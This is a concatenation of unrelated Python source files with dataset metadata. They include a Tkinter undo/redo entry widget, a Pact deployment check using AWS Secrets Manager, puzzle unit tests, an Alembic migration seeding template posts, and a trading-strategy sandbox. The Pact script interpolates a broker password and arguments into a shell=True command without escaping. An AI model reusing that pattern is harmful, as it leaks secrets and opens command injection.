'post_index'))\n \n class DataChangedInfo:\n def __init__(self, pre=None, post=tk.END):\n self.pre_index = pre\n self.post_index = post\n \n def reset(self):\n self.pre_index = None\n self.post_index = tk.END\n \n def __str__(self):\n return str(self.pre_index) + ', ' + str(self.post_index)\n \n def __repr__(self):\n pre, post = tuple(map(repr, (self.pre_index, self.post_index)))\n return f'DataChangedInfo({pre}, {post})'\n \n def __init__(self, parent, max_length=None, **kwargs):\n self.data_var = kwargs.pop('textvariable', tk.StringVar())\n self.max_length = max_length\n self.data_changed_info = ClipboardEntry.DataChangedInfo()\n super().__init__(parent, textvariable=self.data_var, **kwargs)\n \n self.history = [ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), None, self.index(tk.INSERT))]\n self.redo_stack = []\n \n self.context_menu = self.create_menu()\n self.bind(\"<Button-3>\", self._show_context_menu)\n self.bind(\"<Control-z>\", self.undo)\n self.bind(\"<Control-y>\", self.redo)\n self.bind(\"<Key>\", self._on_key_pressed)\n self.data_var.trace('w', self._on_data_changed)\n self.focus = self.focus_set\n \n def create_menu(self):\n menu = tk.Menu(self, tearoff=False)\n menu.add_command(label=\"Cut\")\n menu.add_command(label=\"Copy\")\n menu.add_command(label=\"Paste\")\n return menu\n \n def clear_history(self):\n self.history.clear()\n self.redo_stack.clear()\n self.history.append(ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), None, self.index(tk.INSERT)))\n \n def insert(self, index, string):\n idx = index if index != tk.INSERT else self.index(tk.INSERT)\n self.data_changed_info.pre_index = idx\n self.data_changed_info.post_index = idx + len(string)\n super().insert(index, string)\n \n def delete(self, first, last=None):\n def fix_index(idx):\n if idx == tk.INSERT:\n return self.index(tk.INSERT)\n elif idx == tk.END:\n return len(self.data_var.get())\n return idx\n fst, lst 
= tuple(map(fix_index, (first, last)))\n length = lst - fst if lst is not None else 1\n self.data_changed_info.pre_index = fst + length\n self.data_changed_info.post_index = fst\n super().delete(first, last)\n \n def focus_set(self):\n self.icursor(self.history[-1].post_index)\n super().focus()\n \n def undo(self, event=None):\n if len(self.history) > 1:\n pre_index = self.history[-1].pre_index\n self.redo_stack.append(self.history.pop())\n self.data_var.set(self.history[-1].data)\n if pre_index is not None:\n self.icursor(pre_index)\n \n def redo(self, event=None):\n if self.redo_stack:\n self.history.append(self.redo_stack.pop())\n self.data_var.set(self.history[-1].data)\n self.icursor(self.history[-1].post_index)\n\n def _on_key_pressed(self, event=None):\n # guaranteed to happen before the data_var trace callback (_on_data_changed)\n length_difference = len(self.data_var.get()) - len(self.history[-1].data)\n self.data_changed_info.pre_index = self.index(tk.INSERT) - length_difference\n self.data_changed_info.post_index = self.index(tk.INSERT)\n \n def _on_data_changed(self, *args):\n data = self.data_var.get()\n if data != self.history[-1].data:\n if self.max_length is None or len(data) <= self.max_length:\n hist_entry = ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), self.data_changed_info.pre_index, self.data_changed_info.post_index)\n self.history.append(hist_entry)\n self.redo_stack.clear()\n if len(self.history) > ClipboardEntry.MAX_HISTORY + 1:\n self.history.pop(0)\n else:\n self.data_var.set(self.history[-1].data)\n if self.data_changed_info.pre_index is not None:\n self.icursor(self.data_changed_info.pre_index)\n self.data_changed_info.reset()\n \n def _show_context_menu(self, event):\n self.context_menu.entryconfigure(\"Cut\", command=lambda: self.event_generate(\"<<Cut>>\"))\n self.context_menu.entryconfigure(\"Copy\", command=lambda: self.event_generate(\"<<Copy>>\"))\n self.context_menu.entryconfigure(\"Paste\", command=lambda: self.event_generate(\"<<Paste>>\"))\n self.context_menu.post(event.x_root, event.y_root)","sub_path":"ui/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123798145","text":"import boto3\nimport subprocess\nimport re\nimport os\nimport argparse\nfrom boto3 import Session\nfrom boto3 import exceptions\n\n\nclass PactDeploymentCheck:\n def __init__(\n self,\n pact_broker_url,\n broker_user_name,\n broker_secret_name,\n consumer_pacticipant,\n provider_pacticipant,\n consumer_api_version,\n git_commit,\n ):\n\n self.pact_broker_url = pact_broker_url\n self.broker_user_name = broker_user_name\n self.broker_secret_name = broker_secret_name\n self.consumer_pacticipant = consumer_pacticipant\n self.provider_pacticipant = provider_pacticipant\n self.consumer_api_version = consumer_api_version\n self.git_commit = git_commit\n self.broker_password = self.get_secret()\n\n current_folder = os.path.basename(os.path.normpath(os.getcwd()))\n if \"CI\" in os.environ:\n if current_folder == \"test\":\n self.pact_path_prefix = \"../../\"\n else:\n self.pact_path_prefix = \"../\"\n else:\n if current_folder == \"test\":\n self.pact_path_prefix = \"../../../\"\n else:\n self.pact_path_prefix = \"../../\"\n\n def can_i_deploy(self):\n # can-i-deploy with the consumer git_commit and the latest provider version tagged <consumer_api_version>_production\n command = '''{pact_path_prefix}pact/bin/pact-broker can-i-deploy \\\\\n --broker-base-url=\\\"{pact_broker_url}\\\" 
\\\\\n --broker-username=\\\"{broker_user_name}\\\" \\\\\n --broker-password=\\\"{broker_password}\\\" \\\\\n --pacticipant=\\\"{consumer_pacticipant}\\\" \\\\\n --version \\\"{git_commit_consumer}\\\" \\\\\n --pacticipant \\\"{provider_pacticipant}\\\" \\\\\n --latest \\\"{latest}\\\"'''.format(\n pact_broker_url=self.pact_broker_url,\n broker_user_name=self.broker_user_name,\n broker_password=self.broker_password,\n consumer_pacticipant=self.consumer_pacticipant,\n provider_pacticipant=self.provider_pacticipant,\n latest=f\"{self.consumer_api_version}_production\",\n git_commit_consumer=self.git_commit,\n pact_path_prefix=self.pact_path_prefix,\n )\n\n #\n command_response = subprocess.Popen(\n command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n )\n\n fail_build = True\n for line in command_response.stdout.readlines():\n if \"Computer says yes\" in str(line):\n fail_build = False\n pass\n\n ansi_escape_8bit = re.compile(\n br\"(?:\\x1B[@-Z\\\\-_]|[\\x80-\\x9A\\x9C-\\x9F]|(?:\\x1B\\[|\\x9B)[0-?]*[ -/]*[@-~])\"\n )\n last_line = ansi_escape_8bit.sub(b\"\", line)\n print(last_line)\n\n return fail_build\n\n def get_secret(self):\n \"\"\"\n Gets the secret for PACT broker\n \"\"\"\n\n if self.broker_secret_name == \"local\":\n return \"dummy_password\"\n\n region_name = \"eu-west-1\"\n\n client = boto3.client(\"sts\")\n account_id = client.get_caller_identity()[\"Account\"]\n print(f\"Current users account: {account_id}\")\n\n role_to_assume = \"arn:aws:iam::997462338508:role/get-pact-secret-production\"\n response = client.assume_role(\n RoleArn=role_to_assume, RoleSessionName=\"assumed_role\"\n )\n\n session = Session(\n aws_access_key_id=response[\"Credentials\"][\"AccessKeyId\"],\n aws_secret_access_key=response[\"Credentials\"][\"SecretAccessKey\"],\n aws_session_token=response[\"Credentials\"][\"SessionToken\"],\n )\n\n client = session.client(service_name=\"secretsmanager\", region_name=region_name)\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=self.broker_secret_name\n )\n secret = get_secret_value_response[\"SecretString\"]\n except exceptions.ClientError as e:\n print(\"Unable to get secret from Secrets Manager\")\n raise e\n\n return secret\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Check if we can continue our CI pipeline.\"\n )\n parser.add_argument(\n \"--pact_broker_url\",\n default=\"https://pact-broker.api.opg.service.justice.gov.uk\",\n help=\"Base URL for the pact broker.\",\n )\n parser.add_argument(\n \"--broker_user_name\",\n default=\"admin\",\n help=\"The user to log in to pact broker with.\",\n )\n parser.add_argument(\n \"--broker_secret_name\",\n default=\"pactbroker_admin\",\n help=\"Name of the secret to use to get the password.\",\n )\n parser.add_argument(\n \"--consumer_pacticipant\",\n default=\"Complete the deputy report\",\n help=\"Name of the consumer of the API.\",\n )\n parser.add_argument(\n \"--provider_pacticipant\",\n default=\"OPG Data\",\n help=\"Name of the provider of the API.\",\n )\n parser.add_argument(\n \"--consumer_api_version\",\n default=\"v1\",\n help=\"Name of consumer version to check.\",\n )\n parser.add_argument(\n \"--git_commit\",\n default=\"d31b90b\",\n help=\"Reference for the consumer git commit version.\",\n )\n\n args = parser.parse_args()\n\n deployment_check = PactDeploymentCheck(\n args.pact_broker_url,\n args.broker_user_name,\n args.broker_secret_name,\n args.consumer_pacticipant,\n args.provider_pacticipant,\n args.consumer_api_version,\n 
args.git_commit,\n )\n\n print(deployment_check.can_i_deploy())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"shared_code/pact/opg_pact/consumer_pact_check.py","file_name":"consumer_pact_check.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257792458","text":"#!/usr/bin/env python\n\nimport unittest\nfrom day07 import has_abba, get_abba_allowed_strings, get_abba_disallowed_strings\nfrom day07 import supports_tls, count_tls_addresses\nfrom day07 import find_abas, supports_ssl, count_ssl_addresses\n\n\nclass TestFindingABBASequences(unittest.TestCase):\n cases = (\n ('abba', True),\n ('oxyyxo', True),\n ('aaaa', False),\n ('abcd', False),\n )\n\n def test_finds_abba_sequences(self):\n for text, expected in self.cases:\n self.assertEqual(has_abba(text), expected)\n\n\nclass TestGettingAllowedChunks(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst[abcd]defg', ['abba', 'qrst', 'defg']),\n )\n\n def test_finds_allowed_substrings(self):\n for text, expected in self.cases:\n self.assertEqual(get_abba_allowed_strings(text), expected)\n\n\nclass TestGettingDisallowedChunks(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst[abcd]defg', ['mnop', 'abcd']),\n )\n\n def test_finds_disallowed_substrings(self):\n for text, expected in self.cases:\n self.assertEqual(get_abba_disallowed_strings(text), expected)\n\n\nclass TestCheckingTLSAddresses(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst', True),\n ('abcd[bddb]xyyx', False),\n ('aaaa[qwer]tyui', False),\n ('ioxxoj[asdfgh]zxcvbn', True),\n )\n\n def test_finds_tls_addresses(self):\n for text, expected in self.cases:\n self.assertEqual(supports_tls(text), expected)\n\n def test_counts_tls_addresses(self):\n data = [x[0] for x in self.cases]\n self.assertEqual(count_tls_addresses(data), 2)\n\n\nclass TestFindingABASequences(unittest.TestCase):\n cases = (\n ('aba', ['aba']),\n ('xyxxyx', ['xyx']),\n ('aaakekeke', ['eke', 'kek']),\n ('zazbzbzbcdb', ['bzb', 'zaz', 'zbz']),\n )\n\n def test_finds_aba_sequences(self):\n for text, expected in self.cases:\n self.assertEqual(find_abas(text), expected)\n\n\nclass TestCheckingSSLAddresses(unittest.TestCase):\n cases = (\n ('aba[bab]xyz', True),\n ('xyx[xyx]xyx', False),\n ('aaa[kek]eke', True),\n ('zazbz[bzb]cdb', True),\n )\n\n def test_finds_ssl_addresses(self):\n for text, expected in self.cases:\n self.assertEqual(supports_ssl(text), expected)\n\n def test_counts_ssl_addresses(self):\n data = [x[0] for x in self.cases]\n self.assertEqual(count_ssl_addresses(data), 3)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"day07/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217459282","text":"from selenium import selenium\n\n# version: 2.001\nimport unittest, time, re\n\nclass gsmarena_samsung(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*firefox\", \"http://www.gsmarena.com/\")\n self.selenium.start()\n \n def test_gsmarena_samsung(self):\n sel = self.selenium\n sel.open(\"/\")\n sel.click(\"link=Phone Finder\")\n sel.wait_for_page_to_load(\"30000\")\n sel.select(\"name=idMaker\", \"label=Samsung\")\n sel.click(\"name=chkHSDPA2100\")\n sel.select(\"name=TalkTime\", \"label=More than 10 hours\")\n sel.click(\"css=input.st-button\")\n sel.wait_for_page_to_load(\"30000\")\n \n def 
tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"demo/testsuite-selenium/gsmarena_samsung.py","file_name":"gsmarena_samsung.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"72505456","text":"import os\n# get the image names in the test folder to use them as cmd params\n\ndir_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'in')\n\ncmdParams = \"\"\nfor root, dirs, filenames in os.walk(dir_path):\n for f in filenames:\n cmdParams += os.path.join(root, f) + \" \"\n\nwith open(\"t.txt\", 'w') as f:\n\tf.write(cmdParams)\n","sub_path":"msc/ImageThumbnailBatch/getImagesNamesFromTestFolder.py","file_name":"getImagesNamesFromTestFolder.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415774405","text":"\"\"\"posts table\n\nRevision ID: a5b9000f295e\nRevises: e32dd245038a\nCreate Date: 2020-09-28 19:49:40.126045\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a5b9000f295e'\ndown_revision = 'e32dd245038a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n posts = op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=140), nullable=True),\n sa.Column('body', sa.String(length=1400), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['userr.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n op.bulk_insert(posts,\n [\n {\n 'id': 1,\n 'title': 'intro',\n 'body': '## intro\\n\\nthis is a web service application template that uses the following stack:\\n* **Python (flask)**\\n* **ReactJS** (functional components)\\n'\n '* **Redux** and **react-redux**\\n* **PostgreSQL**\\n* **Docker** and **docker-compose**\\n* **GitlabCI**\\n\\n'\n 'The main idea of this template is to use it as a starting point for rapid development of web services.\\n'\n 'It implements basic authorization/authentication functionality using `JWT tokens`.\\n',\n 'user_id': 1\n },\n {\n 'id': 2,\n 'title': 'backend',\n 'body': '## backend\\n\\nis based on the **Flask** framework, which gives the highest level of flexibility in choosing tools and technologies for '\n 'web application development.\\n\\nUsed extensions:\\n* **flask-sqlalchemy**\\n* **flask-migrate**\\n* **flask_restful**\\n* **flask_jwt_extended**\\n\\n'\n 'Authentication is implemented using `JWT tokens`. All authorization/authentication related information is stored in the database.\\n\\n'\n 'A default user `guest/guest1` is provided to launch it out of the box.',\n 'user_id': 1\n },\n {\n 'id': 3,\n 'title': 'frontend',\n 'body': '## frontend\\n\\ndeveloped using ReactJS. 
Chosen simply as the most popular framework, one that gives the ability to develop a flexible '\n 'SPA in a short time.\\n\\n'\n 'Build system:\\n* **npm**\\n* **webpack**\\n* **babel**\\n\\n'\n 'Components library used:\\n* **material-ui**\\n\\n'\n 'Served by the backend as a single prebuilt static `index.html` file.\\n\\n'\n 'Used technologies:\\n* **redux** and **react-redux** to store the state of all components in a single place\\n'\n '* **route** to implement front-side URL navigation\\n'\n '* **local storage** to store JWT tokens\\n'\n '* **redux-logger** for development purposes',\n 'user_id': 1\n },\n {\n 'id': 4,\n 'title': 'database',\n 'body': '## database\\n\\n**PostgreSQL** is used as the main SQL database to store data. '\n 'There was no serious reason to use PostgreSQL specifically; it is just what was used historically. '\n 'Database migration (`flask db`) is implemented to simplify deployment and future schema updates.\\n\\n'\n '#### DB schema:\\n- table `alembic_version` with following fields:\\n - version_num\\n- table `userr` with '\n 'following fields:\\n - id\\n - username\\n - email\\n - password_hash\\n- table `post` with following fields:\\n - id\\n'\n ' - title\\n - body\\n - timestamp\\n - user_id\\n'\n '- table `revoked_tokens` with following fields:\\n - id\\n - jti\\n',\n 'user_id': 1\n },\n {\n 'id': 5,\n 'title': 'devops',\n 'body': '## devops\\n\\n**docker** and **docker-compose** are used for containerization. `Dockerfile` and `docker-compose.yml` '\n 'can be found in the root folder of the project.\\n',\n 'user_id': 1\n },\n {\n 'id': 6,\n 'title': 'ci/cd',\n 'body': '## ci/cd\\n\\nDeploy automation using `gitlab runners` is implemented. The `.gitlab-ci.yml` file can be found in the root folder of the project.',\n 'user_id': 1\n },\n {\n 'id': 7,\n 'title': 'project structure',\n 'body': '## project structure\\n\\n- **application.py** is the entry point for the flask backend. All backend related sources are placed in the **/app** folder.\\n'\n '- **/migrations** - folder used by `flask db` to migrate the database. In case of any future database changes, '\n 'do not forget to register them using `flask db migrate`. '\n 'Try to divide db changes into small, logically separated chunks, like you do with merge requests in git.\\n'\n '- **/ui** - contains the ReactJS based frontend UI project.\\n'\n '- **/static_** - contains the prebuilt frontend SPA page generated using the `make ui-build` command. '\n 'Not necessary to put it under git control; done just for quick launching without installed js/node programs.\\n'\n '- **Dockerfile**, **docker-compose.yml**, **entrypoint.sh**, **Makefile**, **wait-for-it.sh** are used for deploying with docker containers.\\n'\n '- **requirements.txt** - contains the list of used Python packages. The frontend equivalent can be found in **/ui/package.json**.\\n',\n 'user_id': 1\n },\n {\n 'id': 8,\n 'title': 'to-do',\n 'body': '## to-do\\n\\n'\n '* add email validation to the registration process.\\n'\n '* add `GraphQL` or `Swagger` to simplify synchronization between backend and frontend during API development. 
\\n'\n '* add a `react native` template to this project that shares the source base of the existing ReactJS project and is '\n 'compatible with the existing backend and database schema, as a starting point for mobile application development.\\n',\n 'user_id': 1\n },\n {\n 'id': 9,\n 'title': 'user manual',\n 'body': '## user manual\\n\\n* login as `guest/guest1` at [flask-reactjs-template](https://flask-reactjs-template.m2m-tele.com/)\\n* run `docker-compose up` from the root folder of the project and access `http://localhost:8887/` using a browser. '\n 'Use the `guest/guest1` credentials to log in.\\n'\n '* to run without docker: `make ui-install && make ui-build && flask run`. But you must set up the correct environment variables '\n 'shown in the `database.conf` file to access your local **postgresql** database.\\n',\n 'user_id': 1\n },\n {\n 'id': 10,\n 'title': 'security',\n 'body': '## security\\n\\nDo not place the `database.conf` file under git version control. Find another way to deliver environment variables to ' \n '`production` and `development` machines.\\n',\n 'user_id': 1\n },\n ])\n\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_table('post')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/a5b9000f295e_posts_table.py","file_name":"a5b9000f295e_posts_table.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"233379568","text":"from __future__ import division\nimport json, time, datetime\n\nclass order:\n \"\"\"\n Class object for order data\n \"\"\"\n def __init__(self, instrument, units, side, trade_type, expiry, price):\n # Order instrument (currency pair, str, \"EUR_USD\")\n self.instrument = instrument\n # Order units (number of units of instrument) ($ investment / price)\n self.units = units\n # Order side (buy/sell, str)\n self.side = side\n # Type: limit, stop, marketIfTouched, market\n self.type = trade_type\n # Expiry: order expiration date (valid datetime format)\n self.expiry = expiry\n # Price to execute order\n self.price = price\n\n def printOrder(self):\n \"\"\"\n Display Order Data\n \"\"\"\n pass\n\n\nclass tradingStrategy:\n \"\"\"\n Class object for trading strategy data (initializing data, history, trade, etc)\n \"\"\"\n def __init__(self, name, initial_price, closing_price, initial_investment, heartbeat, instrument, side):\n self.name = name\n self.initial_price = initial_price\n self.closing_price = closing_price\n self.initial_investment = initial_investment\n self.heartbeat = heartbeat\n self.instrument = instrument\n self.side = side\n\n self.price_step = self.calculate_price_step()\n self.investment_per_trade = self.calculate_investment_amount()\n\n self.print_trading_strategy(initial=True)\n\n self.orders = []\n\n def calculate_price_step(self):\n \"\"\"\n Calculate Price Step: N = (closing_price - initial_price) / heartbeat\n\n See README #6\n \"\"\"\n return (self.closing_price - self.initial_price) / self.heartbeat\n\n def calculate_investment_amount(self):\n \"\"\"\n Calculate Investment Amount: I = (total investment) / heartbeat\n\n See README #7\n \"\"\"\n return self.initial_investment / self.heartbeat\n\n def print_trading_strategy(self, initial=False):\n \"\"\"\n Print Trading Strategy\n \"\"\"\n message = \"\\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* TRADING STRATEGY INITIALIZED: \\n\" \\\n \"* Name: %s \\n\" \\\n \"* 
Instrument: %s \\n\" \\\n \"* Side: %s \\n\" \\\n \"* Investment Amount: %0.2f \\n\" \\\n \"* Initial Price: %0.4f \\n\" \\\n \"* Closing Price: %0.4f \\n\" \\\n \"* Heartbeat: %d \\n\" \\\n \"* Price Step: %0.4f \\n\" \\\n \"* Investment Per Trade: %0.2f \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"*************** WATCHING THE PRICE ******************\\n\" \\\n \"--------------------------------------------------------\\n\" % (self.name, self.instrument, self.side, self.initial_investment, self.initial_price, \n self.closing_price, self.heartbeat, self.price_step, self.investment_per_trade)\n print(message)\n\n\ndef get_market_price(trading_strategy, debug, prices, step):\n \"\"\"\n Get Current Market Price of Instrument for Trading Strategy\n\n If DEBUG = TRUE: get price from test file\n If DEBUG = FALSE: poll OANDA for current price\n \"\"\"\n if debug:\n return datetime.datetime.strptime(prices[step][\"data\"][\"date\"], \"%Y-%m-%d\"), prices[step][\"data\"][\"price\"]\n else:\n return getOandaPrice(trading_strategy)\n\n\ndef handleWait(trading_strategy, date, price):\n \"\"\"\n Waiting until price goes to initial price\n \"\"\"\n message = \"\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* PRICE CHECKED: %s \\n\" \\\n \"* RESULT: Waiting...price has not reached threshold \\n\" \\\n \"* Trading Strategy Initial Price: %0.4f \\n\" \\\n \"* Current Price: %0.4f \\n\" \\\n \"* Timestamp: %s \\n\" \\\n \"* CHECKING AGAIN SOON.... \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"*************** WATCHING THE PRICE ******************\\n\" \\\n \"--------------------------------------------------------\\n\" % (trading_strategy.name, trading_strategy.initial_price, price, date)\n print(message)\n\ndef handleBeginning(trading_strategy, date, price):\n \"\"\"\n Enter into alive state\n \"\"\"\n message = \"\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* PRICE CHECKED: %s \\n\" \\\n \"* RESULT: Trading strategy is now live, buying in \\n\" \\\n \"* Trading Strategy Initial Price: %0.4f \\n\" \\\n \"* Current Price: %0.4f \\n\" \\\n \"* Timestamp: %s \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"************** MAKING INITIAL ORDER *****************\\n\" \\\n \"--------------------------------------------------------\\n\" % (trading_strategy.name, trading_strategy.initial_price, price, date)\n print(message)\n\n\ndef begin_trading_strategy(my_trading_strategy, debug=True, price_history=None, step=None):\n \"\"\"\n Main Handler for LIVE Trading Strategy:\n \"\"\"\n print(\"make initial order\")\n\n level = 1\n while True:\n date, price = get_market_price(my_trading_strategy, debug, price_history, step)\n\n price_low = my_trading_strategy.initial_price\n price_threshold = my_trading_strategy.initial_price + my_trading_strategy.price_step * level\n\n while True:\n print(\"------waiting------\")\n print(\"LOW: %0.4f\" % price_low)\n print(\"HIGH: %0.4f\" % price_threshold)\n\n step+=1\n\ndef initializeStrategy(name, initial_price, closing_price, initial_investment, heartbeat, instrument, side, debug=True, prices=None):\n \"\"\"\n Begin trading strategy, start watching the price, initialize when P <= initial price. 
\n \"\"\"\n # INITIALIZE TRADING STRATEGY\n my_trading_strategy = tradingStrategy(name, initial_price, closing_price, initial_investment, heartbeat, instrument, side)\n\n price_history = None\n if debug and prices:\n price_file = open(prices, \"r\")\n price_history = json.load(price_file)\n price_history = price_history[::-1]\n\n # ENTER INTO TRADING STRATEGY\n step = 0\n while True:\n date, current_price = get_market_price(my_trading_strategy, debug, price_history, step)\n\n if (current_price <= my_trading_strategy.initial_price):\n # Display Message, Trading Strategy is Now Live\n handleBeginning(my_trading_strategy, date, current_price)\n # Enter into live state\n break\n else:\n # Display Waiting Message, Trading Strategy is not live\n handleWait(my_trading_strategy, date, current_price)\n\n # Wait half a second (this is debug mode)\n step+=1\n time.sleep(0.5)\n\n begin_trading_strategy(my_trading_strategy, debug, price_history, step)\n\ndef main():\n \"\"\"\n Main: Sandbox testing of trading strategy. See README for details.\n \"\"\"\n # Trading strategy name (identifier)\n name = \"Hill's Test Trading Strategy\"\n\n # Price at which to begin trading strategy (See #1 in README)\n initiating_price = 0.7272\n\n # Price at which to close trading strategy (See #2 in README)\n closing_price = 0.9000\n\n # Total investment in strategy (See #3 in README)\n initial_investment = 100000\n\n # Trading strategy heartbeat/increment/step (See #4 in README)\n heartbeat = 50\n\n # Instrument of the trading strategy\n instrument = \"USD_EUR\"\n\n # Side of the trade the trading strategy is on\n side = \"buy\"\n\n # Testing (See #5 in README)\n strategy_debug = True\n\n # If testing, file of historical prices\n test_prices = \"synthetic_prices/USD_EUR_TEST.json\"\n\n # Initialize trading strategy\n initializeStrategy(name, initiating_price, closing_price, initial_investment, heartbeat, instrument, side, debug=strategy_debug, prices=test_prices)\n\nif __name__ == \"__main__\":\n main()","sub_path":"sandbox/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":8951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"30065744","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom models.output_layer import *\nfrom models.utils import *\nfrom models import base\n\n\nclass Model(base.SRNNBase):\n def __init__(self, d_data, d_emb, d_mlp, d_rnn, d_lat, n_layer, dropout=0.,\n **kwargs):\n super(Model, self).__init__(d_data, d_emb, d_mlp, d_rnn, d_lat, n_layer,\n dropout)\n\n ##### low-level modules\n self.inp_emb_low = nn.Sequential(\n nn.Linear(1, d_emb),\n nn.Dropout(dropout)\n )\n\n self.n_low_layer = kwargs.get('n_low_layer', 1)\n self.rnn_low = nn.LSTM(d_rnn + d_emb, d_rnn, dropout=dropout)\n for i in range(self.n_low_layer):\n params = 'self.rnn_low.weight_hh_l{}'.format(i)\n nn.init.orthogonal_(eval(params).data)\n\n self.init_h = nn.Parameter(\n torch.Tensor(self.n_low_layer, self.d_rnn).uniform_(-0.01, 0.01))\n self.init_c = nn.Parameter(\n torch.Tensor(self.n_low_layer, self.d_rnn).uniform_(-0.01, 0.01))\n\n ##### output modules\n crit_d_tgt = self.d_data\n crit_inp_shape = (d_data, self.d_rnn)\n self.crit = GMCriterion(1, crit_d_tgt, crit_inp_shape)\n\n\n def _init_hid_low(self, bsz):\n h = self.init_h[:,None,:].expand(-1, bsz, -1).contiguous()\n c = self.init_c[:,None,:].expand(-1, bsz, -1).contiguous()\n return (h, c)\n\n\n def forward(self, x, y, hidden=None, mask=None):\n qlen, bsz, _ = 
x.size()\n\n        ##### high-level computation\n        z, output, mu_prior, logvar_prior, mu_post, theta_post = \\\n            self.srnn_forward(x, y)\n\n\n        ##### low-level computation\n        x_low = y.permute(2, 0, 1).contiguous()\n        x_low = x_low.view(self.d_data, qlen * bsz, 1)\n\n        # input to the low-level rnn\n        x_low_emb = self.inp_emb_low(x_low)\n        extra_inp = output.view(1, qlen * bsz, self.d_rnn) \\\n            .expand(self.d_data, -1, -1)\n        extra_inp = self.drop(extra_inp)\n        inp_low = torch.cat([x_low_emb, extra_inp], -1)\n\n        # initial state for the low-level\n        hid_low = self._init_hid_low(qlen * bsz)\n\n        # low-level rnn forward\n        out_low, _ = self.rnn_low(inp_low, hid_low)\n\n        # out_low: [d_data x (qlen*bsz) x d_rnn]\n        out_low = torch.cat([hid_low[0], out_low[:-1]], 0)\n        out_low = self.drop(out_low)\n\n        # out_low: [qlen x bsz x d_data x d_rnn]\n        out_low = out_low.view(self.d_data, qlen, bsz, self.d_rnn) \\\n            .permute(1, 2, 0, 3).contiguous()\n\n        ##### loss\n        # NLL\n        nll = self.crit(out_low, y)\n        nll = nll.sum(-1)\n        if mask is not None:\n            nll = nll * mask\n\n        # KL(q||p)\n        kld = gaussian_kld([mu_post, theta_post], [mu_prior, logvar_prior])\n        kld = kld.sum(-1)\n        if mask is not None:\n            kld = kld * mask\n\n        return nll, -kld, None\n\n","sub_path":"speech/models/srnn_hier_inp.py","file_name":"srnn_hier_inp.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"96503560","text":"import json\n\n\nclass Response:\n    def __init__(self, code, body=None, headers=None):\n        self.code = code\n        self.body = body\n        self.headers = headers\n\n    def format(self):\n        \"\"\"\n        Format the Response instance to the\n        expected Lambda response format.\n        \"\"\"\n        response = {\n            \"statusCode\": self.code\n        }\n\n        if self.body is not None:\n            response[\"body\"] = json.dumps(self.body)\n\n        if self.headers is not None:\n            response[\"headers\"] = self.headers\n\n        return response\n","sub_path":"pylambdarest/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45557520","text":"#The code from https://people.csail.mit.edu/albert/bluez-intro/x232.html was used to connect to the server and transfer data. 
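\n#A minimal client-side sketch for this server (the MAC address below is a placeholder for the server Pi's Bluetooth adapter; port 1 matches the bind below):\n#\n#    import bluetooth\n#    sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n#    sock.connect((\"XX:XX:XX:XX:XX:XX\", 1))\n#    sock.send(\"sensor reading from RPi 1\")\n#    sock.close()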
